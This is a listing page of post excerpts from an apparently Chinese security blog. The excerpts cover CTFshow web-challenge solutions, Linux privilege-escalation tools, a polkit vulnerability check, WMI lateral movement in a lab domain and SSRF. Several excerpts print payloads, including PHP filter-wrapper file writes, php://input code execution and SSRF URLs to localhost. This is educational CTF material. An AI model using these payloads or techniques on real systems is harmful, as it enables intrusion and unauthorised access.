上一页 1 2 3 4 5 6 7 8 9 ··· 15 下一页
摘要: 一.t权限只能作用在文件夹,t权限的作用就是在这个目录下创建的文件属于这个用户,这个文件的删除修改等只能由这个用户来使用,各个用户创建的文件互不干扰。t表示有x和t权限,T表示没有x权限。 验证t权限 创建一个文件,赋予对应的权限,并切换到/根目录下 查看test文件夹的权限,可以看到已经有了t权限 阅读全文
posted @ 2024-08-12 14:55 mushangqiujin 阅读(251) 评论(0) 推荐(0)
摘要: 1.web103 和102一样 payload: v2=115044383959474e6864434171594473&v3=php://filter/write=convert.base64-decode/resource=1.php post v1=hex2bin 2.web104 值只要一样 阅读全文
posted @ 2024-08-12 14:36 mushangqiujin 阅读(16) 评论(0) 推荐(0)
摘要: 1.web126 和前面一样的 payload: get: a=1+fl0g=flag_give_me post: CTF_SHOW=&CTF[SHOW.COM=&fun=parse_str($a[1]) 或 get: ?$fl0g=flag_give_me post:CTF_SHOW=&CTF[S 阅读全文
posted @ 2024-08-09 11:35 mushangqiujin 阅读(42) 评论(0) 推荐(0)
摘要: 1.web119 和118题类似,只不过是过滤了PATH 0可以用任何字符代替,比如 A , {A}, A,{0} KaTeX parse error: Expected '}', got '#' at position 2: {#̲SHLVL}=1,或者{##},${#?} {PHP_VERSIO 阅读全文
posted @ 2024-08-08 17:23 mushangqiujin 阅读(38) 评论(0) 推荐(0)
摘要: 1.msf的searchsploit 2.msf的post/multi/recon/local_exploit_suggester 模块 3.脚本 信息搜集:linuxprivchecker,LinEnum,BeRoot(python) 漏洞探针:linux-exploit-suggester1&2 阅读全文
posted @ 2024-08-08 07:56 mushangqiujin 阅读(56) 评论(0) 推荐(0)
摘要: 漏洞影响2009年5月至今的所有polkit版本 此工具是linux系统预装工具,所有存在此工具的linux系统都会收到影响 判断是否有这个漏洞: dpkg -l policykit-1 #debain,ubuntu rpm -qai policykit-1 #centos,redhat 本次环境是 阅读全文
posted @ 2024-08-08 07:36 mushangqiujin 阅读(66) 评论(0) 推荐(0)
摘要: 0x01 横向移动之wmi wmi可以通过hash或明文进行验证,不会在系统日志中留下痕迹,使用139端口 复现环境: god.org win2008 dc win2012sql win2008 web 准备: cs上线 win2008web 提权利用ms14-058 抓取hash和明文密码(当获取 阅读全文
posted @ 2024-08-07 22:29 mushangqiujin 阅读(159) 评论(0) 推荐(0)
摘要: 1.web351 尝试访问本机的flag.php payload: url=http://localhost/flag.php url=http://127.0.0.1/flag.php 2.web352 必须要用http或https,ip没有过滤因为匹配时没加变量,恒为真 payload: url 阅读全文
posted @ 2024-08-05 00:06 mushangqiujin 阅读(80) 评论(0) 推荐(0)
摘要: 1.web87 绕过死亡待可以使用rot13编码,还可以用base64编码,url两次编码,浏览器自动进行解码一次,代码解码一次,如果之编码一次,代码会被浏览器解码一次,这时候特殊字符还是url编码,而如php字符串则被还原,然后就被过滤了 payload: 1.rot13绕过 #下放url编码为p 阅读全文
posted @ 2024-08-04 04:30 mushangqiujin 阅读(118) 评论(0) 推荐(0)
摘要: 1.web78 payload: php://input post 传入以下数据 <?php system('cat flag.php')?> php://filter/convert.base64-encode/resource=flag.php data://text/palin,<?php s 阅读全文
posted @ 2024-08-01 15:41 mushangqiujin 阅读(86) 评论(0) 推荐(0)
上一页 1 2 3 4 5 6 7 8 9 ··· 15 下一页